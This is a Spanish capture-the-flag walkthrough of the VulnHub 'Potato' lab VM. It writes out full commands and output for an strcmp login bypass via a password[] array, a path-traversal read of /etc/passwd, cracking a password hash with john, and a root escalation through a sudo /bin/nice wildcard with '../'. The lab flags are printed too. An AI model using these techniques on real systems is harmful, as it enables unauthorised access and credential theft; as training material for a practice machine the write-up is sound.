[VULNHUB] Potato

Hoy vamos a hackear la maquina de Vulnhub llamada Potato. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/potato-1,529/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.136 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 11:09 CEST Nmap scan report for 192.168.1.136 Host is up (0.00043s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Potato company 2112/tcp open ftp | fingerprint-strings: | GenericLines: | 220 ProFTPD Server (Debian) [::ffff:192.168.1.136] | Invalid command: try being more creative |_ Invalid command: try being more creative 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port2112-TCP:V=7.70%I=7%D=9/10%Time=5F59ED59%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,90,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:192\. SF:168\.1\.136\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20 SF:creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creat SF:ive\r\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.77 seconds
    Vemos que tiene HTTP, SSH y FTP en el puerto 2112. Nos conectamos al FTP con anonymous/anonymous para ver que hay.
    ~ > ftp 192.168.1.136 2112 Connected to 192.168.1.136. 220 ProFTPD Server (Debian) [::ffff:192.168.1.136] Name (192.168.1.136:sml): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230-Welcome, archive user anonymous@192.168.1.59 ! 230- 230-The local time is: Thu Sep 10 11:12:03 2020 230- 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxr-xr-x 2 ftp ftp 4096 Aug 2 19:33 . drwxr-xr-x 2 ftp ftp 4096 Aug 2 19:33 .. -rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak -rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg 226 Transfer complete ftp>
    Nos descargamos el fichero index.php.baj.
    ftp> get index.php.bak local: index.php.bak remote: index.php.bak 200 PORT command successful 150 Opening BINARY mode data connection for index.php.bak (901 bytes) 226 Transfer complete 901 bytes received in 0.00 secs (928.1464 kB/s) ftp> get welcome.msg local: welcome.msg remote: welcome.msg 200 PORT command successful 150 Opening BINARY mode data connection for welcome.msg (54 bytes) 226 Transfer complete 54 bytes received in 0.00 secs (1.1704 MB/s) ftp>
    Le echamos un vistazo.
    ~ > cat index.php.bak ---SNIP--- if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) { ---SNIP---
    Vemos que en el codigo php utilizan la funcion strcmp la cual es vulnerable[1]. Sabiendo esto, usamos gobuster para ver si encontramos algun directorio interesante en la web.
    ~ > gobuster dir -u http://192.168.1.136/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.136/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/09/10 11:10:43 Starting gobuster =============================================================== /.hta (Status: 403) /.htpasswd (Status: 403) /admin (Status: 301) /.htaccess (Status: 403) /index.php (Status: 200) /server-status (Status: 403) =============================================================== 2020/09/10 11:10:46 Finished ===============================================================
    Encontramos el directorio /admin :) Al visitar http://192.168.1.136/admin nos aparece una web donde debemos meter usuario y password. Como ya hemos visto el codigo y conocemos la vulnerabilidad, arrancamos Burp, ponemos como usuario "admin" y como password lo que queramos... Una vez capturada la request, la modificamos por:
    username=admin&password[]=%22%22
    Ha funcionado :) Ahora debemos hacer clic en "dashboard". Dentro de Dashboard tenemos varias "opciones", pero si miramos la de "Log" veremos que podemos escoger 3 ficheros. Escogemos cualquiera de ellos y capturamos la request con Burp. Modificaremos el parametro "file=" para que nos muestre el /etc/passwd quedando la request de la siguiente manera
    POST /admin/dashboard.php?page=log HTTP/1.1 Host: 192.168.1.136 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.136/admin/dashboard.php?page=log Content-Type: application/x-www-form-urlencoded Content-Length: 30 DNT: 1 Connection: close Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh Upgrade-Insecure-Requests: 1 file=../../../../../etc/passwd
    Nos devuelve:
    Contenu du fichier ../../../../../etc/passwd : ---SNIP--- webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin ---SNIP---
    Vemos que hay un usuario llamado webadmin y aparece su password cifrada. Usamos john para crackear la password!
    ~/Descargas/john-1.9.0-jumbo-1/run > ./john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack.txt Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status dragon (webadmin) 1g 0:00:00:00 DONE (2020-09-10 12:31) 100.0g/s 19200p/s 19200c/s 19200C/s 123456..november Use the "--show" option to display all of the cracked passwords reliably Session completed
    Vemos que john consigue la password. Nos logueamos al ssh con los credenciales obtenidos (webadmin/dragon).
  • Low Shell
  • ~ > ssh webadmin@192.168.1.136 webadmin@192.168.1.136's password: Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu 10 Sep 2020 12:31:36 PM UTC System load: 0.08 Usage of /: 12.6% of 31.37GB Memory usage: 36% Swap usage: 0% Processes: 114 Users logged in: 0 IPv4 address for enp0s3: 192.168.1.136 IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fe89:8d97 Last login: Sun Aug 2 19:56:20 2020 from 192.168.1.11 webadmin@serv:~$
  • user.txt
  • webadmin@serv:~$ ls -la total 32 drwxr-xr-x 3 webadmin webadmin 4096 Aug 2 19:26 . drwxr-xr-x 4 root root 4096 Aug 2 18:18 .. -rw------- 1 webadmin webadmin 357 Aug 2 19:10 .bash_history -rw-r--r-- 1 webadmin webadmin 220 Aug 2 18:18 .bash_logout -rw-r--r-- 1 webadmin webadmin 3771 Aug 2 18:18 .bashrc drwx------ 2 webadmin webadmin 4096 Aug 2 18:34 .cache -rw-r--r-- 1 webadmin webadmin 807 Aug 2 18:18 .profile -rw------- 1 webadmin root 69 Aug 2 19:26 user.txt webadmin@serv:~$ cat user.txt TGUgY29udHLDtGxlIGVzdCDDoCBwZXUgcHLDqHMgYXVzc2kgcsOpZWwgcXXigJl1bmUg
  • Privilege Escalation
  • Miramos si podemos hacer algo con sudo.
    webadmin@serv:/home/florianges$ sudo -l [sudo] password for webadmin: Sorry, try again. [sudo] password for webadmin: Matching Defaults entries for webadmin on serv: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User webadmin may run the following commands on serv: (ALL : ALL) /bin/nice /notes/*
    Vemos que podemos ejecutar nice al directorio /notes/*. Aprovecharemos ese * :)
    webadmin@serv:~$ echo "/bin/bash" > shell.sh webadmin@serv:~$ chmod 777 shell.sh webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/shell.sh root@serv:/home/webadmin# id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@serv:/home/webadmin# cd /root root@serv:~# ls root.txt snap root@serv:~# cat root.txt bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNp ZWwuIA==
  • End
  • Y con esto ya seriamos root de la maquina. [1]https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016